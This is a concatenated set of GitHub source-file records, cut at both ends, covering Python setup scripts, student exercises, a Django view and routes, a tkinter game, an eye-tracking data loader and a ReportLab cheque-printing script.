toc - tic = {:.2}s\".format(current_frame / ending_frame, int(current_frame / input_fps),\n toc - tic))\n\n cap.release()\n out.release()\n print()\n","repo_name":"feihongyu/track","sub_path":"yolo-feature-track-v1.00/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26473705793","text":"from setuptools import setup\n\nwith open('README.md') as readme_file:\n README = readme_file.read()\n\nsetup(\n name='cisco-anyconnect-cli',\n packages=['cisco_anyconnect_cli'],\n version='0.6',\n license='apache-2.0',\n description='Cisco AnyConnect command line interface',\n author='Juergen Schmid',\n url='https://github.com/hacki11/cisco-anyconnect-cli',\n keywords=['vpn', 'cisco', 'anyconnect', 'cli'],\n install_requires=[\n 'click',\n 'keepasshttp'\n ],\n entry_points={\n 'console_scripts': ['anyconnect=cisco_anyconnect_cli.cli:main'],\n },\n classifiers=[\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3',\n 'Operating System :: Microsoft :: Windows'\n ],\n)\n","repo_name":"hacki11/cisco-anyconnect-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"9915938040","text":"# A8Q4\nimport sys\nsys.setrecursionlimit (30000)\nimport math\n\nn = eval(input(\"Enter the starting point N:\\n\"))\nm = eval(input(\"Enter the ending point M:\\n\"))\nindex = 0\nprimeIndex = 2\n\ndef isPrime(i):\n global primeIndex\n if i == 2:\n return True\n if i % primeIndex == 0 or i == 1:\n return False\n primeIndex += 1\n if primeIndex <= math.ceil(math.sqrt(i)):\n return isPrime(i)\n return True\n\n\ndef isPalindrome(s, index):\n \n if len(s) == 1:\n return True\n if (index >(len(s)//2)-1):\n return True\n else:\n if s[index] == s[len(s) - 1 - index]:\n return isPalindrome(s, index+1)\n else: \n return False\n \n\ndef main():\n global n\n \n global primeIndex\n primeIndex = 2\n \n \n if isPrime(n) == True:\n if isPalindrome(str(n), 0) == True:\n print(n)\n n+=1\n if n<=m:\n main()\nprint(\"The palindromic primes are:\")\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/chnjea007/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5553740042","text":"valores=[]\nfor i in range(10):\n valor=int(input(f\"ingrese el valor {i+1}: \"))\n valores.append(valor)\n continue\nprint(valores)\npromedioValores=sum(valores)/len(valores)\nordenAsc=sorted(valores)\nordenDesc=sorted(valores, reverse=True)\nprint(promedioValores)\nprint(ordenAsc)\nprint(ordenDesc)","repo_name":"RolandoHRGt/actGit_proyectoDos_201213994","sub_path":"PROBLEMA6.py","file_name":"PROBLEMA6.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30066499383","text":"def character_n_gram(s,n):\n l=s.replace(\" \",\"\")\n res=[l[i:i+n]for i in range(len(l)-n+1)]\n return res\ns=\"paraparaparadise\"\nt=\"paragraph\"\nx=set(character_n_gram(s,2))\ny=set(character_n_gram(t,2))\n\n#union\nprint(x|y)\n#intersection\nprint(x^y)\n#subtraction\nprint(x-y)\n\nif \"se\" in x:\n print(\"se in 
x\")\nelse:\n print(\"se not in x\")\nif \"se\" in y:\n print(\"se in y\")\nelse:\n print(\"se not in y\")","repo_name":"Valkyrja3607/NLP100_2020","sub_path":"06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37888524493","text":"#!/usr/bin/python\n# Given a XML file, replace 'bad' XML traits\n# \ti.e. XML file came with hyperlinks on separate lines, remove them\n#\t\treplace '&' with '&'\n\nold_file = open(\"trucks.xml\", \"r\")\nnew_file = open(\"trucks_.xml\", \"w\")\n\nflagHeader = True\nfor line in old_file:\n\tif line.find(\"http:\") == 0:\n\t\tcontinue # remove hyperlinks that are their own contents!\n\tnewline = line.replace(\"&\", \"&\")\n\tnew_file.write(newline)\n\t\nnew_file.close()\nold_file.close()","repo_name":"ahsu1230/Uber_challenge","sub_path":"helper_tools/parseBadXML.py","file_name":"parseBadXML.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26913394428","text":"from django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nimport json\nfrom pymongo import MongoClient\n\n\n#@csrf_exempt\ndef empresa_view(request):\n \n print(request)\n if request.method == 'POST':\n \t\n try:\n data = json.loads(request.body)\n \n user_email = data['user_email']\n\n print(data)\n \n client = MongoClient('mongodb://localhost:27017/')\n db = client['mydatabase']\n \n # Insert the user data into the 'users' collection\n # users = db['Empresas']\n # users.insert_one(data)\n # print(user_email)\n \n users = db['users']\n # doc = users.find({'user_info.email': user_email})\n # for c in doc:\n # print(c['user_info'])\n users.update_one({'user_info.email': user_email}, {'$set': {'empresa_details': data}})\n \n return JsonResponse({'status': 'success'})\n except Exception as e:\n return JsonResponse({'status': 'error', 'message': str(e)})\n else:\n return JsonResponse({'status': 'error', 'message': 'Invalid request method'})\n","repo_name":"PECI-11/projeto","sub_path":"Backend/empresa/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11898086118","text":"import tkinter\nfrom random import *\ncanvas = tkinter.Canvas(width=1000, height=200)\ncanvas.pack()\n\n# 1-8: Fruits, 9-16: Vegetables\n\n\ndef load_data(s, data, filetype):\n while len(data) < 9:\n r = randint(1, 16)\n if r not in data:\n data.append(r)\n for j in range(len(data)):\n path = tkinter.PhotoImage(file=f\"Images/91_5/oz_{data[j]}{filetype}\")\n s.append(path)\n\n s.append(None)\n data.append(0)\n fruit_check()\n\n\ndef draw_items(x, y):\n canvas.delete(\"img\")\n for img in sequence:\n canvas.create_image(x, y, image=img, anchor=\"nw\", tags=\"img\")\n x += 100\n\n\ndef draw_shelf():\n for i in range(10):\n canvas.create_line(10 + i*100, 130, 10 + i*100 + 80, 130, fill=\"black\")\n\n\ndef click(coord):\n global sequence, data_collection\n x = coord.x\n pick_index = x // 100\n click_counter()\n\n empty_shelf = sequence.index(None)\n distance = abs(pick_index-empty_shelf)\n if distance <= 2:\n sequence[pick_index], sequence[empty_shelf] = sequence[empty_shelf], sequence[pick_index]\n data_collection[pick_index], data_collection[empty_shelf] = \\\n data_collection[empty_shelf], data_collection[pick_index]\n draw_items(10, 40)\n 
progress_check()\n\n\ndef click_counter():\n global click_count\n canvas.delete("count")\n click_count += 1\n canvas.create_text(500, 170,\n text=f"Count: {click_count}", font="Arial 15", tags="count")\n\n\ndef fruit_check():\n global fruit_count\n for fruit in data_collection:\n if 0 < fruit <= 8:\n fruit_count += 1\n\n\ndef progress_check():\n check_value = 0\n for j in range(fruit_count):\n if 0 < data_collection[j] <= 8:\n check_value += 1\n if check_value == fruit_count and data_collection[-1] == 0:\n win()\n\n\ndef win():\n canvas.destroy()\n end = tkinter.Canvas(width=200, height=200)\n end.pack()\n end.create_text(100, 100, text="You won!", font="Arial 30 bold")\n\n\nsequence = []\ndata_collection = []\nfruit_count, click_count = int(), int()\nload_data(sequence, data_collection, ".png")\ndraw_items(10, 40)\ndraw_shelf()\nclick_counter()\ncanvas.bind_all("<Button-1>", click)\ncanvas.mainloop()\n","repo_name":"michalspano/.py","sub_path":"src/6-images/91_5.py","file_name":"91_5.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8938445917","text":"#!/usr/bin/env python3\n# This file is part of FES library.\n#\n# FES is free software: you can redistribute it and/or modify\n# it under the terms of the GNU LESSER GENERAL PUBLIC LICENSE as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# FES is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU LESSER GENERAL PUBLIC LICENSE for more details.\n#\n# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE\n# along with FES. 
If not, see .\n\"\"\"This script is the entry point for building, distributing and installing\nthis module using distutils/setuptools.\"\"\"\nfrom typing import List\nimport os\nimport pathlib\nimport platform\nimport re\nimport subprocess\nimport sys\nimport sysconfig\n\nimport packaging.version\nimport setuptools\nimport setuptools.command.build_ext\nimport setuptools.command.install\nimport setuptools.command.sdist\nimport setuptools.command.test\n\n# Check Python requirement\nMAJOR = sys.version_info[0]\nMINOR = sys.version_info[1]\n\n# Versioning tag\nPATTERN = '#define FES_VERSION'\n\n# Working directory\nWORKING_DIRECTORY = pathlib.Path(__file__).parent.absolute()\n\n\ndef build_dirname(extname=None):\n \"\"\"Returns the name of the build directory\"\"\"\n extname = '' if extname is None else os.sep.join(extname.split('.')[:-1])\n if packaging.version.parse(\n setuptools.__version__) >= packaging.version.parse('62.1'):\n return pathlib.Path(\n WORKING_DIRECTORY, 'build', f'lib.{sysconfig.get_platform()}-'\n f'{sys.implementation.cache_tag}', extname)\n return pathlib.Path(WORKING_DIRECTORY, 'build',\n f'lib.{sysconfig.get_platform()}-{MAJOR}.{MINOR}',\n extname)\n\n\ndef execute(cmd):\n \"\"\"Executes a command and returns the lines displayed on the standard\n output\"\"\"\n process = subprocess.Popen(cmd,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stream = process.stdout\n assert stream is not None\n return stream.read().decode()\n\n\ndef update_version(path, version, pattern, replaced_line):\n \"\"\"Updating the version number description\"\"\"\n with open(path) as stream:\n lines = stream.readlines()\n pattern = re.compile(pattern)\n\n for idx, line in enumerate(lines):\n match = pattern.search(line)\n if match is not None:\n lines[idx] = replaced_line % version\n\n with open(path, 'w') as stream:\n stream.write(''.join(lines))\n\n\ndef update_meta(path, version):\n \"\"\"Updating the version number description in conda/meta.yaml.\"\"\"\n update_version(path, version, r'{% set version = \".*\" %}',\n '{%% set version = \"%s\" %%}\\n')\n\n\ndef update_python_module(path, version):\n \"\"\"Updating the version number in the python module.\"\"\"\n update_version(path, version, r'm\\.attr\\(\"__version__\"\\) = \"([\\d\\.]+)\";',\n 'm.attr(\"__version__\") = \"%s\";\\n')\n\n\ndef revision():\n \"\"\"Returns the software version.\"\"\"\n os.chdir(WORKING_DIRECTORY)\n path = pathlib.Path(__file__).parent.joinpath('include', 'fes.h')\n\n # If the \".git\" directory exists, this function is executed in the\n # development environment, otherwise it's a release.\n if not pathlib.Path(WORKING_DIRECTORY, '.git').exists():\n pattern = re.compile(PATTERN + r' \"(.*)\"').search\n with open(path) as stream:\n for line in stream:\n match = pattern(line)\n if match is not None:\n return match.group(1)\n raise AssertionError()\n\n stdout = execute('git describe --tags --dirty --long --always').strip()\n pattern = re.compile(r'([\\w\\d\\.]+)-(\\d+)-g[\\w\\d]+(?:-(dirty))?')\n match = pattern.search(stdout)\n if match is None:\n # No tag found, use the last commit\n pattern = re.compile(r'[\\w\\d]+(?:-(dirty))?')\n match = pattern.search(stdout)\n assert match is not None, f'Unable to parse git output {stdout!r}'\n version = '0.0'\n else:\n version = match.group(1)\n commits = int(match.group(2))\n if commits != 0:\n version += f'.dev{commits}'\n\n with open(path) as stream:\n lines = stream.readlines()\n\n for idx, line in enumerate(lines):\n if PATTERN in line:\n lines[idx] 
= PATTERN + \" \\\"%s\\\"\\n\" % version\n\n with open(path, 'w') as stream:\n stream.writelines(lines)\n\n update_meta(WORKING_DIRECTORY.joinpath('conda', 'meta.yaml'), version)\n update_python_module(WORKING_DIRECTORY.joinpath('python', 'main.cpp'),\n version)\n return version\n\n\nclass CMakeExtension(setuptools.Extension):\n \"\"\"Python extension to build\"\"\"\n\n def __init__(self, name):\n super().__init__(name, sources=[])\n\n\nclass BuildExt(setuptools.command.build_ext.build_ext):\n \"\"\"Build the Python extension using cmake\"\"\"\n user_options = setuptools.command.build_ext.build_ext.user_options\n user_options += [\n ('c-compiler=', None, 'Preferred C compiler'),\n ('cxx-compiler=', None, 'Preferred C++ compiler'),\n ('generator=', None, 'Selected CMake generator'),\n ('netcdf-root=', None, 'Preferred NetCDF installation prefix'),\n ('reconfigure', None, 'Forces CMake to reconfigure this project')\n ]\n\n def initialize_options(self) -> None:\n \"\"\"Set default values for all the options that this command\n supports.\"\"\"\n super().initialize_options()\n self.c_compiler = None\n self.cxx_compiler = None\n self.generator = None\n self.netcdf_root = None\n self.reconfigure = None\n\n def finalize_options(self) -> None:\n \"\"\"Set final values for all the options that this command supports.\"\"\"\n super().finalize_options()\n\n def run(self):\n \"\"\"Carry out the action\"\"\"\n for ext in self.extensions:\n self.build_cmake(ext)\n super().run()\n\n @staticmethod\n def is_conda():\n \"\"\"Detect if the Python interpreter is part of a conda distribution.\"\"\"\n result = pathlib.Path(sys.prefix, 'conda-meta').exists()\n if not result:\n try:\n # pylint: disable=unused-import\n import conda # noqa: F401\n\n # pylint: enable=unused-import\n except ImportError:\n result = False\n else:\n result = True\n return result\n\n def set_cmake_user_options(self):\n \"\"\"Sets the options defined by the user.\"\"\"\n is_conda = self.is_conda()\n result = []\n\n if self.c_compiler is not None:\n result.append('-DCMAKE_C_COMPILER=' + self.c_compiler)\n\n if self.netcdf_root is not None:\n result.append('-DNETCDF_INCLUDE_DIR=' +\n os.path.join(self.netcdf_root, 'include'))\n result.append(\n '-DNETCDF_LIBRARY=' +\n os.path.join(self.netcdf_root, 'lib', 'libnetcdf.so'))\n elif is_conda:\n result.append('-DCMAKE_PREFIX_PATH=' + sys.prefix)\n\n return result\n\n def get_cmake_args(self, cfg: str, extdir: str) -> List[str]:\n \"\"\"build cmake arguments.\n\n # Args:\n * `cfg`: config, one of {\"debug\", \"release\"}\n * `extdir`: output directory.\n \"\"\"\n cmake_args = [\n '-DBUILD_PYTHON=on',\n '-DBUILD_SHARED_LIBS=off',\n '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + str(extdir),\n '-DCMAKE_PREFIX_PATH=' + sys.prefix,\n '-DPython3_EXECUTABLE=' + sys.executable,\n ] + self.set_cmake_user_options()\n\n is_windows = platform.system() == 'Windows'\n\n if self.generator is not None:\n cmake_args.append('-G' + self.generator)\n elif is_windows:\n cmake_args.append('-G' + 'Visual Studio 16 2019')\n\n if is_windows:\n cmake_args += [\n '-DCMAKE_GENERATOR_PLATFORM=x64',\n '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(\n cfg.upper(), extdir),\n ]\n else:\n cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]\n if platform.system() == 'Darwin':\n cmake_args += ['-DCMAKE_OSX_DEPLOYMENT_TARGET=10.14']\n return cmake_args\n\n def get_build_args(self, cfg: str) -> List[str]:\n \"\"\"make compiler build arguments.\n\n # Args:\n * `cfg`: config, one of {\"debug\", \"release\"}\n \"\"\"\n build_args = ['--config', cfg]\n 
is_windows = platform.system() == 'Windows'\n if is_windows:\n build_args += ['--', '/m']\n else:\n build_args += ['--', '-j%d' % os.cpu_count()]\n\n return build_args\n\n def build_cmake(self, ext):\n \"\"\"execute cmake to build the python extension\"\"\"\n # these dirs will be created in build_py, so if you don't have\n # any python sources to bundle, the dirs will be missing\n build_temp = pathlib.Path(WORKING_DIRECTORY, self.build_temp)\n build_temp.mkdir(parents=True, exist_ok=True)\n extdir = build_dirname(ext.name)\n\n cfg = 'debug' if self.debug else 'release'\n\n os.chdir(str(build_temp))\n\n # Has CMake ever been executed?\n if pathlib.Path(build_temp, 'CMakeFiles',\n 'TargetDirectories.txt').exists():\n # The user must force the reconfiguration\n configure = self.reconfigure is not None\n else:\n configure = True\n\n if configure:\n cmake_args = self.get_cmake_args(cfg, str(extdir))\n self.spawn(['cmake', str(WORKING_DIRECTORY)] + cmake_args)\n if not self.dry_run: # type: ignore\n build_args = self.get_build_args(cfg)\n self.spawn(['cmake', '--build', '.', '--target', 'pyfes'] +\n build_args)\n os.chdir(str(WORKING_DIRECTORY))\n\n\nclass Revision(setuptools.Command):\n \"\"\"Get the current git revision\"\"\"\n\n description = 'get the current git revision'\n user_options = []\n\n def initialize_options(self):\n \"\"\"initialize options\"\"\"\n pass\n\n def finalize_options(self):\n \"\"\"finalize options\"\"\"\n pass\n\n def run(self):\n \"\"\"Carry out the action\"\"\"\n print(revision())\n\n\ndef main():\n setuptools.setup(\n name='pyfes',\n version=revision(),\n classifiers=[\n 'Development Status :: 3 - Stable',\n 'Topic :: Scientific/Engineering :: Physics',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Operating System :: POSIX',\n 'Operating System :: MacOS',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n ],\n description='FES2014 prediction software.',\n url='https://github.com/CNES/aviso-fes',\n author='NES/CLS/LEGOS',\n license='GNU General Public License v3 (GPLv3)',\n ext_modules=[CMakeExtension(name='pyfes')],\n setup_requires=[],\n # install_requires=[\"numpy\"],\n # tests_require=[\"netCDF4\", \"numpy\"],\n # package_dir={'': 'src'},\n # packages=setuptools.find_packages(where=\"src\"),\n cmdclass={\n 'build_ext': BuildExt,\n 'revision': Revision\n }, # type: ignore\n zip_safe=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CNES/aviso-fes","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":11899,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"43"} +{"seq_id":"32678925251","text":"\nimport os\nimport glob\nimport numpy as np\nimport os.path as osp\nimport csv\n\n\nclass _ExerciseOculo(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, fname, signal, annotations=None, infos=None):\n self.fname = osp.basename(fname)\n self.signal = np.array(signal).astype(float)\n self.annotations = annotations\n self.infos = infos\n\n\ndef load_eyefant(fname):\n X = []\n delimiter = '\\t'\n full_fname = fname\n with open(full_fname, encoding=\"ISO-8859-1\") as f:\n nb_sig = int(f.readline().replace('Number of signals:', ''))\n for i in range(5):\n f.readline()\n f.readline()\n info = []\n for i in range(nb_sig):\n 
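# Descriptive note (editor's addition): one tab-separated header line per signal; the first field (its label) is dropped.\n 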
info.append(f.readline().strip().split(delimiter)[1:])\n f.readline()\n for line in f.readlines():\n line = line.strip().replace(',', '.')\n X.append(line.split(delimiter)[1:])\n\n X = np.array(X)\n try:\n if X.shape[1] == 7:\n X = X[::8, :-1]\n except ValueError:\n pass\n\n if X.shape[1] == 6:\n X = X[:, 2:]\n\n\n return _ExerciseOculo(full_fname, X)\n\n\n","repo_name":"tomMoral/detrending_csc_oculo","sub_path":"src/database/data_Eye.py","file_name":"data_Eye.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"37356039132","text":"# _*_ coding:utf-8 _*_\n__author__ = 'pb'\n__date__ = '2017/3/16 23:55'\nfrom django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^(?P\\d+)/$', views.product_detail,name='product_detail'),\n url(r'^slablist/(?P\\d+)/$', views.slablist_detail,name='slablist'),\n url(r'^', views.product_list,name='product_list'),\n ]","repo_name":"pbpoon/dj-jxc","sub_path":"apps/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4579338669","text":"import os\r\nimport subprocess\r\ntry:\r\n from reportlab.pdfgen import canvas\r\nexcept ImportError:\r\n # ReportLab is not installed, install it using pip\r\n print("Installing ReportLab...")\r\n subprocess.run(['pip', 'install', 'reportlab'])\r\n print("ReportLab installed successfully.")\r\n from reportlab.pdfgen import canvas\r\nfrom reportlab.lib.pagesizes import letter\r\nfrom reportlab.lib.units import mm\r\nfrom reportlab.pdfbase import pdfmetrics\r\nfrom reportlab.pdfbase.ttfonts import TTFont\r\n\r\n# define constants\r\nCHEQUE_WIDTH = 215.9 * mm\r\nCHEQUE_HEIGHT = 95.3 * mm\r\nTOP_MARGIN = 10 * mm\r\nLEFT_MARGIN = 15 * mm\r\nRIGHT_MARGIN = 15 * mm\r\nBOTTOM_MARGIN = 15 * mm\r\nMICR_FONT_SIZE = 12\r\nMICR_FONT_PATH = 'GnuMICR.ttf'\r\n\r\n# function to convert number to words\r\ndef convert_number_to_words(num):\r\n ones = ["", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine"]\r\n tens = ["", "", "twenty", "thirty", "forty", "fifty", "sixty", "seventy", "eighty", "ninety"]\r\n teens = ["ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen", "sixteen", "seventeen", "eighteen", "nineteen"]\r\n words = ""\r\n \r\n if num == 0:\r\n return "zero"\r\n \r\n if num < 0:\r\n words += "minus "\r\n num = abs(num)\r\n \r\n if num >= 1000000:\r\n words += convert_number_to_words(num // 1000000) + " million "\r\n num %= 1000000\r\n \r\n if num >= 1000:\r\n words += convert_number_to_words(num // 1000) + " thousand "\r\n num %= 1000\r\n \r\n if num >= 100:\r\n words += ones[num // 100] + " hundred "\r\n num %= 100\r\n \r\n if num >= 20:\r\n words += tens[num // 10] + " "\r\n num %= 10\r\n \r\n if num >= 10 and num <= 19:\r\n words += teens[num - 10] + " "\r\n num = 0\r\n \r\n if num > 0:\r\n words += ones[num] + " "\r\n \r\n return words.capitalize()\r\n\r\n# function to create the printable file\r\ndef create_cheque():\r\n # get input from user\r\n name = input("Enter Your Name: ")\r\n address1 = input("Enter Your First Address Line(1/2): ")\r\n address2 = input("Enter Your Second Address Line(2/2): ")\r\n bank_name = None\r\n while bank_name is None: # loop until a valid menu choice sets the full bank name below\r\n print("Select your bank:")\r\n print("1. 
CIBC\")\r\n print(\"2. RBC\")\r\n print(\"3. TD\")\r\n print(\"4. Scotiabank\")\r\n print(\"5. BMO\")\r\n bank_choice = input(\"Enter your choice (1-5): \")\r\n if bank_choice == \"1\":\r\n bank_name = \"Canadian Imperial Bank of Commerce\"\r\n elif bank_choice == \"2\":\r\n bank_name = \"Royal Bank of Canada\"\r\n elif bank_choice == \"3\":\r\n bank_name = \"TD Canada Trust\"\r\n elif bank_choice == \"4\":\r\n bank_name = \"Scotiabank\"\r\n elif bank_choice == \"5\":\r\n bank_name = \"Bank of Montreal\"\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n bank_address = input(\"Enter Bank Branch Address: \")\r\n date = input(\"Enter Date (YYYY-MM-DD): \")\r\n payee_name = input(\"Enter Payee Name: \")\r\n amount = float(input(\"Enter the amount: \"))\r\n cheque_number = input(\"Enter Cheque Number (3 digits): \")\r\n transit_number = input(\"Enter Transit (Branch) Number: \")\r\n institution_number = input(\"Enter Institution Number: \")\r\n account_number = input(\"Enter Account Number: \")\r\n memo = input(\"Enter Memo: \")\r\n \r\n # convert amount to words\r\n amount_in_words = convert_number_to_words(int(amount))\r\n \r\n # format MICR line\r\n if bank_name.upper() == \"Canadian Imperial Bank of Commerce\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:2],\r\n account_number[2:]\r\n )\r\n elif bank_name.upper() == \"Royal Bank of Canada\":\r\n micr_line = \"C{}C A{}D{}A {}D{}D{}\".format(\r\n cheque_number.zfill(5),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:3],\r\n account_number[3:6],\r\n account_number[6:]\r\n )\r\n elif bank_name.upper() == \"TD Canada Trust\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:4],\r\n account_number[4:]\r\n )\r\n elif bank_name.upper() == \"Scotiabank\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:5],\r\n account_number[5:]\r\n )\r\n elif bank_name.upper() == \"Bank of Montreal\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:4],\r\n account_number[4:]\r\n )\r\n\r\n # create file name\r\n file_name = \"{}_{}.pdf\".format(payee_name.lower().replace(\" \", \"\"), date.replace(\"/\", \"\"))\r\n \r\n # create PDF file and write data to it\r\n c = canvas.Canvas(file_name, pagesize=letter)\r\n \r\n # load fonts\r\n pdfmetrics.registerFont(TTFont('GnuMICR', MICR_FONT_PATH))\r\n c.setFont('GnuMICR', MICR_FONT_SIZE)\r\n \r\n # draw MICR line\r\n micr_line_y = CHEQUE_HEIGHT - TOP_MARGIN - 75 * mm\r\n c.drawString(LEFT_MARGIN, micr_line_y, micr_line)\r\n \r\n # load Arial font for other text\r\n pdfmetrics.registerFont(TTFont('Arial', 'arial.ttf'))\r\n pdfmetrics.registerFont(TTFont('Arial_bold', 'arial_bold.ttf'))\r\n c.setFont('Arial_bold', 12)\r\n \r\n # draw cheque elements\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN, name)\r\n c.setFont('Arial', 10)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 5 * mm, address1)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 10 * mm, address2)\r\n c.setFont('Arial', 12)\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 20 * mm, CHEQUE_HEIGHT - TOP_MARGIN, cheque_number)\r\n c.setFont('Arial', 
10)\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 30 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 10 * mm, \"Date: {}\".format(date))\r\n c.setFont('Arial', 12)\r\n c.drawString(CHEQUE_WIDTH / 3, CHEQUE_HEIGHT - TOP_MARGIN - 20 * mm, bank_name)\r\n c.setFont('Arial', 10)\r\n c.drawString(CHEQUE_WIDTH / 3, CHEQUE_HEIGHT - TOP_MARGIN - 25 * mm, bank_address)\r\n c.setFont('Arial', 12)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 35 * mm, \"PAY {} & {}/100 Dollars\".format(amount_in_words, format_amount(amount)))\r\n c.setFont('Arial_bold', 12)\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 20 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 45 * mm, \"$ {:,.2f}\".format(float(amount)))\r\n c.setFont('Arial', 10)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 45 * mm, \"Pay to the\")\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 50 * mm, \"order of______________________________________\")\r\n c.setFont('Arial', 12)\r\n c.drawString(LEFT_MARGIN + 20 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 50 * mm, payee_name)\r\n c.setFont('Arial', 10)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 60 * mm, \"Memo: {}\".format(memo))\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 45 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 60 * mm, \"____________________\")\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 45 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 65 * mm, \"AUTHORIZED SIGNATURE\")\r\n c.setFont('Arial', 12)\r\n \r\n # add blank line for authorized signature\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 50 * mm, BOTTOM_MARGIN + 10, \"\")\r\n \r\n # save and close PDF file\r\n c.save()\r\n \r\n # print success message\r\n print(\"Cheque created successfully! File Name: {}\".format(file_name))\r\n\r\ndef format_amount(amount):\r\n cents = int(round(amount * 100))\r\n formatted_amount = \"{:02d}\".format(cents % 100)\r\n return formatted_amount\r\n\r\n# run the program\r\ncreate_cheque()","repo_name":"whiteh4cker-tr/chequewriter","sub_path":"chequewriter.py","file_name":"chequewriter.py","file_ext":"py","file_size_in_byte":8097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73137770689","text":"'''\n --- Directions\n Write a function that accepts a string. 
